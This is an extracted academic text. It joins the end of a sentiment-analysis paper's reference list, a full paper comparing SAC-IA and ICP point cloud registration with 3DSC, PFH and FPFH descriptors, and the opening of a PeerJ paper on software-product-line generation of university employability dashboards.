2014. Building large-scale twitter-specific senti- ment lexicon: A representation learning approach. In Proceedings of the International Conference on Com- putational Linguistics (COLING). Duyu Tang, Bing Qin, and Ting Liu. 2015a. Learning se- mantic representations of users and products for docu- ment level sentiment classification. In Proceedings of the Association for Computational Linguistics (ACL). Jian Tang, Meng Qu, Mingzhe Wang, Ming Zhang, Jun Yan, and Qiaozhu Mei. 2015b. Line: Large-scale in- formation network embedding. In Proceedings of the Conference on World-Wide Web (WWW). Mike Thelwall. 2009. Homophily in MySpace. Journal of the American Society for Information Science and Technology, 60(2). Matt Thomas, Bo Pang, and Lillian Lee. 2006. Get out the vote: Determining support or opposition from Congressional floor-debate transcripts. In Proceed- ings of Empirical Methods for Natural Language Pro- cessing (EMNLP). Peter Trudgill. 1974. Linguistic change and diffusion: Description and explanation in sociolinguistic dialect geography. Language in Society, 3(2). Joseph B. Walther and Kyle P. D’Addario. 2001. The impacts of emoticons on message interpretation in computer-mediated communication. Social Science Computer Review, 19(3). Zhen Wang, Jianwen Zhang, Jianlin Feng, and Zheng Chen. 2014. Knowledge graph embedding by trans- lating on hyperplanes. In Proceedings of the National Conference on Artificial Intelligence (AAAI). Robert West, Hristo Paskov, Jure Leskovec, and Christo- pher Potts. 2014. Exploiting social network structure for person-to-person sentiment analysis. Transactions of the Association for Computational Linguistics, 2. Caroline Winterer. 2012. Where is America in the Re- public of Letters? Modern Intellectual History, 9(03). 306 Fangzhao Wu and Yongfeng Huang. 2015. Personal- ized microblog sentiment classification via multi-task learning. In Proceedings of the National Conference on Artificial Intelligence (AAAI). 307 308 work_n5p27oi6fzbm7nfia6k365h77e ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 DOI: 10.21307/ijanmc-2020-004 22 Comparison of Several Different Registration Algorithms Liu Lulu School of Computer Science and Engineering Xi’an Technological University Xi’an, China E-mail: 825927856@qq.com Liu Baolong School of Computer Science and Engineering Xi’an Technological University Xi’an, China E-mail: liu.bao.long@hotmail.com Abstract—The common point cloud registration algorithms are usually divided into initial registration and precise registration. In this paper, SAC-IA algorithm, which is commonly used in PCL, is selected for initial registration, and the traditional ICP algorithm is used for accurate registration. Three different feature descriptors (3D shape context, Point Feature Histograms, Fast Point Feature Histograms) are used to realize SAC- IA algorithm and ICP precise registration algorithm. During the implementation of the algorithm, the registration time and registration error of point cloud are calculated; according to the experimental results, the registration time and registration error of SAC-IA algorithm and ICP algorithm based on three different descriptors are compared. The results show that the registration algorithm based on 3D shape context has high accuracy, but the registration time is too long, which is not suitable for a large number of point cloud data; the registration algorithm based on fast point feature histograms has short registration time and good registration effect. Keywords-Point Cloud Registration; SAC-IA Algorithm; ICP Algorithm; Registration Time; Registration Error I. INTRODUCTION With the rapid development of computer-aided design and computer-aided manufacturing technology, reverse engineering technology, which generates digital model through physical model, has been widely concerned. In reverse engineering, computer vision, 3D image processing and other fields, it is difficult to obtain all the data of the measured object in all directions at one time due to the influence of data acquisition equipment, the shape of the 3D object itself, external environment and so on. Usually, the point cloud data of three-dimensional objects are acquired from different angles by data acquisition equipment for many times, and the point cloud registration algorithm is used to splice the point clouds of various perspectives into the complete point cloud data. Point cloud registration is an important and difficult part of reverse engineering. The registration degree between point clouds will directly affect the accuracy of the whole 3D model, so point cloud registration has become a research hotspot in the field of point cloud processing. Point cloud registration includes manual registration, instrument dependent registration and automatic registration, point cloud automatic registration algorithm is usually used. Automatic registration of point cloud is to calculate the dislocation between two groups of point clouds by algorithm, so as to achieve the purpose of automatic registration of point clouds. From the process of registration, it can be divided into two schemes: initial registration and accurate registration. The initial registration provides the initial transformation matrix for the accurate registration. The accurate registration is the secondary registration based on the initial transformation matrix, which can get more accurate solution and improve the final registration accuracy. Common registration algorithms include ICP algorithm[1], NDT algorithm[2], SAC-IA algorithm, etc. Among them, the accurate registration has been basically fixed to use ICP algorithm and various improved algorithms[3]~[8]. ICP algorithm has high accuracy, but it has strict requirements on the initial matrix. The results of the initial registration are not ideal, which will seriously affect the performance of the algorithm, so that the iteration cannot converge to the global optimal registration results, and even lead to the local optimal situation. Therefore, the initial registration algorithm is also very important in the registration process Important. In this paper, SAC-IA algorithm and ICP accurate registration algorithm based on three different descriptors are selected to perform initial registration and accurate registration for two groups of point cloud International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 23 data collected from different angles. Finally, the experimental results are compared to compare the advantages and disadvantages of several different descriptors in the initial registration algorithm and accurate registration algorithm, and the descriptor more suitable for SAC-IA algorithm and ICP algorithm are selected. II. POINT CLOUD REGISTRATIONS The principle of point cloud registration algorithm is to match the source point cloud Q to the reference system of the target point cloud P through the transformation matrix, that is, P = R * Q + T, where R is the rotation transformation matrix and T is the translation transformation matrix. The essence of point cloud registration algorithm is the process of solving R and T. The specific implementation steps are as follows: Step1. Extract key points from two sets of point cloud data sets according to the same key point selection criteria; Step2. Calculate the feature descriptors of all the selected key points; Step3. Combined with the coordinate position of the feature descriptors in the two sets of point cloud data sets, based on the similarity of the features and positions between the two sets of point cloud data sets, the corresponding relationship between them is estimated, and the corresponding point pairs are preliminarily estimated; Step4. For the noise problem of point cloud data, remove the wrong corresponding point pairs that have influence on registration; Step5. Use the residual correct correspondence to estimate the rigid body transformation and complete the registration. III. SAMPLE CONSENSUS INITIAL ALIGNMENT The initial registration is to prepare for the subsequent accurate registration. The initial registration is carried out for two pieces of point clouds, and the initial values of translation matrix and rotation matrix are calculated. Then the point cloud data to be registered is transformed into a unified coordinate system, providing a better initial position for accurate registration. For the rough estimation of the initial transformation matrix, greedy initial registration method has a lot of work, using the point cloud data rotation invariant feature, and the computational complexity is high, so it is necessary to check all possible correspondence of the feature descriptors; in addition, greedy algorithm may fall into the local optimal solution. Therefore, for the initial registration method of point cloud, we usually choose the sampling consistency method to try to maintain the geometric relationship of the same correspondence, rather than trying to understand all combinations of finite correspondence. Sample Consistence Initial Alignment (SAC-IA for short) algorithm takes a large number of samples from the candidate correspondence, and quickly finds a good transformation by looking at a large number of correspondences. Until the best rotation and translation errors are obtained and stored. In the initial registration algorithm of point cloud, 3D point cloud feature description and extraction is the most basic step, and also the most critical part of the initial registration algorithm of sampling consistency. Sampling consistency registration algorithm is based on local feature description. This chapter mainly realizes the initial registration algorithm of sampling consistency based on three descriptors: 3D shape content descriptors, point feature histogram descriptors and fast point feature histogram descriptors, the optimal results of the initial registration algorithm are obtained by experiments. A. 3D shape context 3D shape context (3dsc for short) uses a vector to describe the shape features of the specified points and their fields on the surface, and establishes the corresponding relationship between the points of different surfaces by matching the values of the vector, which is the descriptor of the specified points. 3Dsc descriptors are simple in structure, strong in discrimination and insensitive to noise. The construction method is as follows: in the spherical support domain with designated point P as the center, the grid is divided into three coordinate directions: radial direction, direction angle and pitch angle, the number of points falling into the grid is counted, and the vector V is constructed. Each element of V corresponds to a grid in the support domain. The value of the element is the number of points in the corresponding grid. The vector V is the descriptor of point P[10]. 3Dsc grid division is shown in Fig. 1. B. Point Feature Histograms Point Feature Histograms (PFH for short) refer to the spatial differences between query points and neighboring points by parameterization, and form a multi-dimensional histogram to describe the neighbor geometric properties of point k. The high-dimensional hyperspace of histogram provides a measurable International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 24 information space for feature representation, which is invariant to the 6-dimensional pose of the corresponding surface of point cloud, and robust under different sampling density or neighborhood noise level. PFH representation is based on the relationship between points and their k neighbors and their estimated normal, considering all the interactions between normal directions, trying to capture the best change of sample surface to describe the geometric characteristics of samples. Therefore, the synthetic feature hyperspace depends on the quality of the surface discovery estimation of each point. Fig. 2 shows the influence area of PFH calculation of a query point . is marked in red and placed in the middle of the ball. The radius is r, and all K-neighbor elements of (all points whose distance from point is less than radius r) are all connected in a network. The final PFH descriptor get histogram by calculating the relationship between all two points in the domain. Figure 1. 3Dsc mesh generation Figure 2. Influence range chart of PFH calculation at query point C. Fast Point Feature Histograms Fast point feature histograms[11](FPFH for short) is a feature descriptor based on the normal angle between points and their neighbors and the angle between the lines between points. It is an improved algorithm by PFH, which retains the main geometric characteristics of point-to-point description in PFH, and reduces the computational complexity from to , where n is the number of points in the point cloud data, and k is the number of neighbors considered when calculating the eigenvector of each point. For a persistent query point , FPFH first uses the pairing between and its neighborhood points (represented by the red line in Fig. 3) to estimate its Simplified Point Feature Histograms (SPFH) value. Compared with the standard calculation of PFH, FPFH has less inter neighborhood interconnection. All points in the point cloud data set need to calculate and obtain SPFH, and calculate the weight according to the SPFH value of the adjacent point of point and the SPFH value of point, and finally get the FPFH value of point. For the calculation connection pairs added in FPFH calculation, the black line in Fig. 3 indicates that some important point pairs (points directly connected with points) are represented by repeated cardinality twice (the thick line in Fig. 3 indicates), and other connected points are represented by thin black line. Figure 3. FPFH calculation neighborhood influence range of query point D. Experimental Verification In this experiment, the classic Bunny point cloud model of Stanford University (as shown in Fig. 4 (a)) is used to compare the efficiency and accuracy of the three algorithms. Finally, the tooth point cloud collected by the laboratory point cloud acquisition equipment (as shown in Fig. 4 (b)) is registered to verify the feasibility of the algorithm comparison results. In Fig. 4, the green point cloud is the source point cloud and the red point cloud is the target point cloud. In Bunny point cloud model, the number of source point cloud is 40256, and the number of target point cloud is 35336; the number of tooth point cloud International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 25 data source point cloud collected in laboratory is 140450, and the number of target point cloud is 145366. (a) Bunny model (b) Tooth point cloud model Figure 4. Point cloud data model The general evaluation standard of point cloud registration is LCP (Largest Common Pointset). That is to say, given two groups of point set P and Q, a transformation T (P) is found, which makes the maximum overlap of P and Q after transformation. If there is another Q point in the tolerance range at any point in the transformed P, it is considered to be a coincidence point. The proportion of coincident points to the number of all points is the degree of overlap. In this paper, the registration accuracy is determined by the rotation and translation errors and distance errors of the registration point cloud relative to the target point cloud on the x-axis, y-axis and z-axis. Compared with LCP, the registration accuracy of the point cloud can be more intuitively expressed. The experimental results of SAC-IA algorithm registration based on 3Dsc, PFH and FPFH feature descriptors are shown in Fig. 5, among them, the red point cloud is the target point cloud, and the blue point cloud is the registered point cloud. (a) 3Dsc+SAC-IA (b) PFH+SAC-IA (c) FPFH+SAC-IA Figure 5. Initial registration results The registration time, rotation angle error on XYZ axis, translation distance error and distance error between registration point cloud and target point cloud of two sets of bunny point cloud are shown in Table I. TABLE I. INITIAL REGISTRATION ERROR TABLE Comparison of registration algorithms Feature Descriptors 3Dsc PFH FPFH SAC-IA runtime 417.381 s 22.727 s 8.085 s x-axis rotation error 0.0400952 ° 0.0474209 ° 0.0265896 ° y-axis rotation error 0.811471 ° 0.758933 ° 0.709945 ° z-axis rotation error -0.740596 ° -0.734409 ° -0.756489 ° x-axis translation error 0.012691 mm 0.007121 mm 0.019262 mm y-axis translation error -0.297463 mm -0.29991 mm -0.298785 mm z-axis translation error -0.192225 mm -0.194115mm -0.194264 mm distance error 0.354395 mm 0.357320 mm 0.356906 mm In terms of algorithm efficiency, 3Dsc needs to calculate the surface shape characteristics of point cloud, which increases the calculation amount; compared with PFH and FPFH, it takes a long time, and FPFH is an improved algorithm based on PFH, that is, FPFH algorithm is more efficient and takes the shortest time. In terms of algorithm accuracy, the smaller the rotation, translation and distance errors of x-axis, y-axis and z-axis are, the higher the accuracy of the algorithm is. From Table I, it can be seen that the accuracy of 3Dsc algorithm combined with SAC-IA algorithm is higher than that of FPFH and PFH algorithm. Therefore, the experimental results show that the algorithm based on FPPH feature descriptor has the shortest registration time and the highest efficiency, and the algorithm based on 3Dsc feature descriptor has relatively high accuracy. IV. ITERATIVE CLOSEST POINT Through the initial registration, the two sets of point cloud data roughly coincide, but the registration accuracy is still far from the requirements of practical applications. Therefore, accurate registration of point cloud data is required to reduce registration errors. In order to register the two groups of point cloud as much as possible and minimize the error between them, this paper uses the classic Iterative Closest Point (ICP for short) algorithm for accurate registration. ICP algorithm[12][13] is the mainstream algorithm for 3D model registration. For each point in the source point cloud, an exhaustive search method is used in the target point cloud to search for the closest point as the International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 26 corresponding point; then the transformation matrix of all corresponding point pairs is registered and aligned, and the source point cloud is finally calculated according to The obtained transformation matrix is transformed. If the measurement error is not considered, the accuracy of the ICP algorithm is affected by the measurement sampling density, and the error value is proportional to the average sampling distance. That is, the higher the sampling density, the higher the accuracy of the stitching. The basic principle of ICP algorithm is to find the nearest point in the target point cloud P and source point cloud Q to be registered according to certain constraints, and then calculate the optimal matching parameter rotation matrix R and translation matrix T to minimize the error function. The error function conforms to equation (1).    n i ii TRPQ n TRF 1 2 ||)(|| 1 ),( (1) Where n is the number of nearest neighbor point pairs, is a point in the target point cloud P, is the nearest point corresponding to in the source point cloud Q, R is the rotation matrix, and T is the translation matrix. A. Experimental Verification According to the initial registration results, the point cloud data is accurately registered by the ICP algorithm. The SCA-IA algorithm based on the 3Dsc, PFH, and FPHF feature descriptors combined with the accurate results of ICP is shown in Fig. 6. (a) 3Dsc+ICP (b) PFH+ICP (c) FPFH+ICP Figure 6. Accurate registration results After ICP precise registration, the initial registration time, precise registration time, rotation angle error on XYZ axis, translation distance error, and the distance error between the two point clouds of the registration point cloud and the target point cloud are as follows: Table II. TABLE II. ACCURATE REGISTRATION ERROR TABLE Comparison of registration algorithms Feature Descriptors 3Dsc PFH FPFH total time 415.765 s 23.804 s 9.094 s SAC-IA runtime 414.86 s 23.15 s 8.435 s ICP runtime 0.905 s 0.654 s 0.659 s x-axis rotation error 0.0141387 ° 0.0325149 ° 0.0134278 ° y-axis rotation error 0.764633 ° 0.721214 ° 0.744733 ° z-axis rotation error -0.758194 ° -0.76543 ° -0.770207 ° x-axis translation error 0.0128116 mm 0.013648 mm 0.015574 mm y-axis translation error -0.298834 mm -0.29914 mm -0.299785 mm z-axis translation error -0.194931 mm -0.19437 mm -0.193715 mm distance error 0.357021 mm 0.357004 mm 0.357266 mm As can be seen from Table II, in terms of algorithm efficiency, the SAC-IA algorithm based on the FPFH feature descriptor combined with the ICP algorithm is relatively shorter. From the perspective of algorithm accuracy, the registration accuracy of SAC-IA algorithm based on 3DSC, PFH, FPFH feature descriptors and ICP precise registration algorithm is not much different. Therefore, for the dental point cloud model collected in the laboratory, the accuracy of the three descriptors is not much different, but in terms of efficiency, the FPFH descriptor is more suitable for point cloud data with a large amount of data. Therefore, the tooth model is registered using the SAC-IA algorithm based on the FPFH feature descriptor and the ICP precise registration algorithm. The registration result is shown in Fig. 7. Figure 7. Tooth Model Registration Results International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 27 V. CONCLUSION In this paper, based on the SAC-IA algorithm of 3Dsc, PFH and FPFH, the bunny point cloud is registered, and the efficiency and accuracy of the initial registration algorithm are analyzed and compared. In the initial registration, SAC-IA algorithm based on 3dsc feature descriptor has a relatively high accuracy, but it takes a long time, which is suitable for the registration with a small number of point clouds and high accuracy requirements; SAC-IA algorithm based on FPFH feature descriptor has a high efficiency, which is suitable for the registration with a large number of point clouds and high efficiency requirements. For the accurate registration algorithm, the ICP algorithm of PCL is used in this paper, and the effect is not ideal from the registration results; in addition, the ICP algorithm can be improved to improve the overall accuracy of the registration algorithm. ACKNOWLEDGMENT The successful completion of this paper cannot be separated from the help of teachers, students and funds. Thanks to Professor Liu Baolong, Mr. Wu Qiong and Mr. Si Lipeng for their guidance and help. Finally, I would like to thank the science and technology program of Weiyang District of Xi'an City (Project No.: 2018036) for its fund support. REFERENCES [1] Besl P J, Mckay H D. A method for registration of 3-D shapes[J]. IEEE Transactions on Pattern Analysis and Machine Intelligence, 1992, 14(2):0-256. [2] Peter Biber and Wolfgang Straßer. The normal distributions transform: A new approach to laser scan matching. In Proceedings of the IEEE International Conference on Intelligent Robots and Systems (IROS), pages 2743–2748, Las Vegas, USA, October 2003. [3] Greenspan M, Yurick M. [IEEE Fourth International Conference on 3-D Digital Imaging and Modeling, 2003. 3DIM 2003. - Banff, Alberta, Canada (6-10 Oct. 2003)] Fourth International Conference on 3-D Digital Imaging and Modeling, 2003. 3DIM 2003. Proceedings. - Approximate K-D tree search for efficient ICP[J]. 2003:442-448. [4] Andreas Nüchter, Lingemann K, Hertzberg J . Cached k-d tree search for ICP algorithms[C]// Sixth International Conference on 3-D Digital Imaging and Modeling, 3DIM 2007, 21-23 August 2007, Montreal, Quebec, Canada. IEEE, 2007. [5] Timothée Jost, Heinz Hügli. Fast ICP Algorithms for Shape Registration[M]// Pattern Recognition. Springer Berlin Heidelberg, 2008. [6] Silva L, Bellon O R, Boyer K L. Precision range image registration using a robust surface interpenetration measure and enhanced genetic algorithms. [J]. IEEE Transactions on Pattern Analysis & Machine Intelligence, 2005, 27(5):762-776. [7] Du S, Liu J, Zhang C, Zhu J, & Li K. Probability iterative closest point algorithm for m-D point set registration with noise[J]. Neurocomputing, 2015, 157:187-198. [8] Chetverikov D, Stepanov D, Krsek P. Robust Euclidean alignment of 3D point sets: the trimmed iterative closest point algorithm[J]. Image and Vision Computing, 2005, 23(3):299-309. [9] Zhu Dehai. PCL course of dianyun Library[M]: Beijing University of Aeronautics and Astronautics, 2012. [10] Frome A, Huber R, Kolluri T, Buelow M.J. Recognizing Objects in Range Data Using Regional Point Descriptors. Proceedings of the European Conference on Computer Vision (ECCV), Prague, Czech Republic, 11–14 May 2004; 3, pp. 224–237. [11] Rusu R B, Blodow N, Beetz M. Fast Point Feature Histograms (FPFH) for 3D registration[C]// Robotics and Automation, 2009. ICRA '09. IEEE International Conference on. IEEE, 2009. [12] Zhang Z. Iterative point matching for registration of free-form curves and surfaces[J]. International Journal of Computer Vision, 1994, 13(2):119-152. [13] Chen Y, Gérard Medioni. Object modeling by registration of multiple range images[J]. Image and Vision Computing, 1992, 10(3):145-155. work_n64oj7fev5b33kne2prdmnt674 ---- Submitted 9 November 2018 Accepted 2 June 2019 Published 1 July 2019 Corresponding author Andrea Vázquez-Ingelmo, andreavazquez@usal.es Academic editor Helen Petrie Additional Information and Declarations can be found on page 24 DOI 10.7717/peerj-cs.203 Copyright 2019 Vázquez-Ingelmo et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Taking advantage of the software product line paradigm to generate customized user interfaces for decision-making processes: a case study on university employability Andrea Vázquez-Ingelmo1, Francisco J. García-Peñalvo1 and Roberto Therón1,2 1 GRIAL Research Group, Department of Computer Science and Automatics, University of Salamanca, Salamanca, Spain 2 VisUSAL Research Group, Department of Computer Science and Automatics, University of Salamanca, Salamanca, Spain ABSTRACT University employment and, specifically, employability has gained relevance since research in these fields can lead to improvement in the quality of life of individual citizens. However, empirical research is still insufficient to make significant decisions, and relying on powerful tools to explore data and reach insights on these fields is paramount. Information dashboards play a key role in analyzing and visually exploring data about a specific topic or domain, but end users can present several necessities that differ from each other, regarding the displayed information itself, design features and even functionalities. By applying a domain engineering approach (within the software product line paradigm), it is possible to produce customized dashboards to fit into particular requirements, by the identification of commonalities and singularities of every product that could be part of the product line. Software product lines increase productivity, maintainability and traceability regarding the evolution of the requirements, among other benefits. To validate this approach, a case study of its application in the context of the Spanish Observatory for University Employability and Employment system has been developed, where users (Spanish universities and administrators) can control their own dashboards to reach insights about the employability of their graduates. These dashboards have been automatically generated through a domain specific language, which provides the syntax to specify the requirements of each user. The domain language fuels a template-based code generator, allowing the generation of the dashboards’ source code. Applying domain engineering to the dashboards’ domain improves the development and maintainability of these complex software products given the variety of requirements that users might have regarding their graphical interfaces. Subjects Human–Computer Interaction, Software Engineering Keywords SPL, DSL, Domain engineering, Dashboards, Employability, Code generation How to cite this article Vázquez-Ingelmo A, García-Peñalvo FJ, Therón R. 2019. Taking advantage of the software product line paradigm to generate customized user interfaces for decision-making processes: a case study on university employability. PeerJ Comput. Sci. 5:e203 http://doi.org/10.7717/peerj-cs.203 https://peerj.com mailto:andreavazquez@usal.es https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.203 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.203 INTRODUCTION The concept of employability has increasingly gained relevance over the last decades. There is a reason: knowing which factors increase the possibility to obtain a job or to perform better in current job positions could be decisive to improve individual and collective life quality. However, this concept is still far away from having a straightforward definition (Chadha & Toner, 2017). As the literature suggests, employability can be seen as a capability to gain employment or as a set of skills and knowledge required to perform effectively in the workplace, among other definitions (Universities UK & Confederation of British Industry, 2009; Hillage & Pollard, 1998; Yorke, 2006). This lack of consensus when defining employability makes the research in this field a complicated task, given the fact that the definition of its factors depends on the perspective used to evaluate it, as well as the socioeconomic context in which employability and employment studies are framed. For these reasons, nowadays research on employability asks for an exploratory approach, to build stronger theoretical foundations. Researching on employability has many potential benefits, aiming not only at knowing the variables that affect the capability to gain employment and have a successful work career, but also to exploit this knowledge to help policymakers and institutions with their missions. This knowledge can contribute to the creation of greater policies, focusing on the detected factors to enhance people’s chances to obtain better employment. Specifically, educational institutions like universities could benefit from this knowledge. These institutions play a vital role regarding the employability of individuals (García-Peñalvo, 2016), as they are in charge of transmitting knowledge and a series of skills to their students. By promoting the most relevant skills and capabilities that affect employability, it could be possible to increase the alignment of education with the labor market. However, generating knowledge in such a study field is not a trivial task. As it has been introduced, there could be several variables involved in the research of students’ employment and employability, so it is necessary to collect significant data volumes to be able to reach valuable insights. In addition to data collection, performing data analysis (Albright, Winston & Zappe, 2010) is required to be able to reach useful insights. It is worth noting that analyzing employability data to identify and understand its factors could become a cornerstone in decision-making processes within educational institutions. Nevertheless, even after performing data analysis, identifying patterns and indicators derived from the analysis outcomes remains a complex challenge. That is why it is crucial to assist decision-makers with powerful tools that allow reaching insights about the domain of the problem, to support decisions with complete and quality information (especially in the academic context, where these processes might have a series of social implications), that is, information and knowledge that has been extracted through visual analysis. Information dashboards are one of the most commonly used software products for visual data analysis and knowledge extraction (Few, 2006; Sarikaya et al., 2018). In a domain like employability, these tools can support exploratory studies through a set of graphical and interactive resources, allowing users to envision data more understandably (Tufte & Graves-Morris, 2014) and identify relevant relations, indicators or patterns among Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 2/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.203 large sets of data. It is essential to bear in mind that information dashboards are not just a set of aesthetic graphs and visualizations; they have to effectively transmit information to answer the questions of the users regarding the target domain. Moreover, this is not a trivial job, because of two main reasons: data and users themselves. On the one hand, users do not have a set of standard and static requirements; they could demand different features or design attributes given their specific goals or needs. On the other hand, data is continuously increasing and evolving nowadays, so it is foreseeable that new information requirements will arise in time. Returning to the employability subject, information requirements in this domain might change in many different ways as this concept could demand new kind of variables or larger amounts of data to explore emerging dimensions or to perform more in-depth analyses. For these reasons, information dashboards not only need to be useful concerning functionality but also be customizable to adapt to specific user requirements. Also, they should be flexible and scalable regarding its data sources and structures, making the development and maintenance of information dashboards even more complicated. Of course, these issues could be addressed by developing particular dashboards for each involved user to achieve every specific goal, but clearly, this solution would be time- consuming and would require a lot of resources during the development and maintenance phases. Also, scalability would be almost impossible, as new users or changes in the requirements would necessarily imply more resources. There are, nevertheless, a series of strategies to deal with these challenges. Specifically, software engineering paradigms like software product lines (Clements & Northrop, 2002; Gomaa, 2004; Pohl, Böckle & Van der Linden, 2005) provide powerful theoretical frameworks to address flexibility, scalability and customization in software products that share sets of features within a common domain. Through the analysis of commonalities and variability points in the product domain, it would be possible to reduce the development and maintenance effort of building tailor-made solutions. This paradigm is potentially applicable to dashboards since these software products could be factored into sets of configurable components with configurable features. This paper describes the application of the SPL methodology to the dashboards’ domain through the study of their characteristics and the definition of a DSL to manage the product derivation automatically. The main focus of this research is to test the potential usefulness and feasibility of this approach to manage fine-grained features that can be scattered through different code assets, and consequently, to provide a base method for generating personalized dashboard solutions to fit concrete user requirements. The remainder of this work is structured as follows. Background discusses the background of the problem of generating customized dashboards as well as their application to the employment and employability domain. Context presents the application context and the motivation behind this pilot framework to generate dashboards to support visual analysis on university employment and employability data (framed within the Spanish Observatory for University Employability and Employment studies. Materials and Methods describes the techniques used for the development of an initial approach to a generative dashboard framework. Finally, the Results section exhibits the outcomes of this research to Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 3/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.203 conclude with the discussion of the developed SPL and the conclusions derived from these results. BACKGROUND The main idea behind software product lines (SPLs) is that the final products can be derived from a set of configurable core assets, allowing their adaptation to fit specific requirements. These core assets are developed during the domain engineering phase, in which commonality and variability of the target product domain are identified to build a common base of components. Core assets are developed with variability points in which specific functionalities could be injected to obtain new products. Functionalities in SPLs are seen as features; the combination of the defined features within the scope of the line (generally following a feature model (Kang et al., 1990) allow stakeholders to build personalized products by reusing and assembling software components. The SPL paradigm has been applied to a variety of domains: Mobile applications (Marinho et al., 2010; Nascimento, 2008; Quinton et al., 2011); Applications for visualizing population statistics (Freeman, Batory & Lavender, 2008); Sensor data visualizations (Logre et al., 2014); Variable content documents (Gómez et al., 2014); or e-Learning systems (Ezzat Labib Awad, 2017). These practical applications have proved the benefits of this paradigm. However, features usually refer to the software’s logic, deflecting attention to the presentation layer. The idea of generating customized dashboards can be seen as a specific case of graphical user interfaces (GUI) automatic generation within SPLs. User interfaces require additional work regarding their implementation; they not only need to be functional but also usable to allow users to complete their tasks efficiently and achieve their goals. That is why the design of user interfaces is present through the whole development process, being time- and resource-consuming job. Automation regarding GUI generation in software product lines has already been faced in several works. Generally, there is a lack of usability on the generated products that can be addressed by manually designing every product GUI. But this approach is highly inefficient in the SPL paradigm context since all the development time saved could be lost by introducing a manual task (Hauptmann et al., 2010). Integration of the GUI design process and the SPL paradigm is required to leverage the benefits of the two approaches (Pleuss, Botterweck & Dhungana, 2010). There is, as Pleuss et al. (2012a); Pleuss et al. (2012b) pointed out, a dilemma between automation and usability. To address this challenge, they utilized Model-Based UI Development (MBUID) methods to separate the functionality and the appearance of the GUI (Pleuss, Botterweck & Dhungana, 2010). On the other hand, Gabillon, Biri & Otjacques (2015) demonstrated the possibility of creating adaptive user interfaces through the Dynamic SPL (DSPL) paradigm and MBUID models by developing a context-aware data visualization tool that can be adapted during runtime. DSPLs provide a useful paradigm for adapting code at run-time, obtaining adaptive GUIs. Kramer et al. (2013) proposed document-oriented GUIs with run-time variations Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 4/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.203 through XML documents (Kramer et al., 2013). This context-adaptable feature has also been achieved by Sboui, Ayed & Alimi (2018), by developing a mobile application that is also runtime adaptable through MBUID models and reusable artifacts. In this particular case, the code generation is based on eXtensible Stylesheet Language Transformations (XSLT) and XML files (Sboui, Ayed & Alimi, 2018). These works shows not only the viability of GUI generation in the SPL/DSPL paradigms context but also their valuable benefits. It seems evident that GUI customization requires fine-grained features to achieve the desired usability and design attributes. Fine-grained features mostly require annotative approaches regarding their implementation, given their specialization. Annotative approaches can address this issue because annotations can be arbitrarily specified at different source code fragments (Kästner & Apel, 2008; Kästner, Apel & Kuhlemann, 2008), and provide a framework for fine-grained automated software composition through feature structure trees (Apel, Kastner & Lengauer, 2009). There are different approaches to manage the implementation of variability at a fine- grained level (Gacek & Anastasopoules, 2001). Especially, frame- and template-based approaches provide valuable solutions to address this fine-grained level of variability, allowing the injection of particular fragments of code at any point of the base source code. Frame-based languages, like XML-based Variant Configuration Language (XVCL) (Jarzabek et al., 2003), provide a syntax to combine and insert fragments of code through the definition of frames, allowing the separation of concerns regarding the SPL implementation (Zhang, Jarzabek & Swe, 2001). Templating can also achieve valuable results; templating libraries such as Jinja2 (Ronacher, 2008) provide powerful functionalities to annotate the source code independently of the target programming language (Clark, 2018; Ridge, Gaspar & Ude, 2017). The generation of GUI within the context of a product family is still a convoluted field, although the previous work has enlightened the path to improve and leverage the automation and generation of these complex software elements. The complexity mainly comes from human factors and the vast variety of requirements regarding user interfaces. This work aims to present an application of the SPL paradigm, in this case on the dashboards’ domain, considering the fine-grained nature of their features and the necessity of customizing its interaction methods and visual appearance. CONTEXT The application of this work is framed within The Spanish Observatory for University Employment and Employability. The following subsections describe this organization’s mission and the motivation to generate personalized dashboards to explore its data. The observatory for university employment and employability The Observatory for University Employment and Employability (also known as OEEU, its Spanish acronym, http://oeeu.org) is an organization with the vision of becoming an information reference for understanding and exploiting knowledge about employment and employability of students from Spanish universities. To do so, this network of researchers and technicians conduct studies about these fields in the academic context (Michavila et Vázquez-Ingelmo et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.203 5/29 https://peerj.com http://oeeu.org http://dx.doi.org/10.7717/peerj-cs.203 al., 2018a; Michavila et al., 2016; Michavila et al., 2018b), through a data-driven approach to recollect, analyze, visualize and disseminate employment and employability data of graduates from Spanish universities. Firstly, in the data collection phase, universities provide their administrative records and, once this phase is completed, their students answer a questionnaire about different aspects of their education and work career. This process leaves the Observatory with a significant set of variables from the students’ sample. For instance, in the 2015 study edition, more than 500 variables were gathered from 13,006 bachelor students. Moreover, in the 2017 study edition, 376 variables were gathered from 6,738 master degree students. The volume of the data collected makes the presentation of the study results to the Observatory ecosystem’s users a challenge, as the latter may have different requirements and necessities regarding the studies’ data. For these reasons, an approach based on domain engineering fits the OEEU’s needs, allowing an efficient generation of customized dashboards that meet different requirements. Motivation As it has been introduced, employment and employability are complex study fields that mainly ask for exploratory analysis, given its relatively initial status of research. In the context of the Spanish Observatory for University Employment and Employability, where a vast set of variables from significant quantities of students are recollected, it is crucial to rely on exploratory visualizations that allow users and administrators to identify at a glance unusual patterns or important data points by enhancing the understanding of the presented information (Card, 1999). In contrast with explanatory visualizations, in which the primary purpose is to tell a story through data, exploratory tools aim to facilitate users to pose more questions as data is being explored. In essence, explanatory analyses start from a question and use data to answer it. Exploratory 